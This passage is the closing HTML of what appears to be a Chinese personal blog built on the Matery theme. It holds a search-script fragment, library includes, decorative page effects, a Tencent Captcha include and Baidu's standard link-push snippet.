                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!--单击显示文字-->
    <script type="text/javascript" src="/js/show_text.js"></script>
    <!--动态标题-->
    <script src="/js/FunnyTitle.js"></script>

    <!-- 爆炸红心效果 -->
    <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
    <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
    <script type="text/javascript" src="/js/firework.js"></script>

    <script type="text/javascript">
        // 只在桌面版网页启用特效
        var windowWidth = $(window).width();
        if (windowWidth > 768) {
            document.write('<script type="text/javascript" src="/libs/others/sakura.js"><\/script>');
        }
    </script>
    

    <!-- 雪花特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/snow.js"><\/script>');
            }
        </script>
    

    <!-- 鼠标星星特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/star.js"><\/script>');
            }
        </script>
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
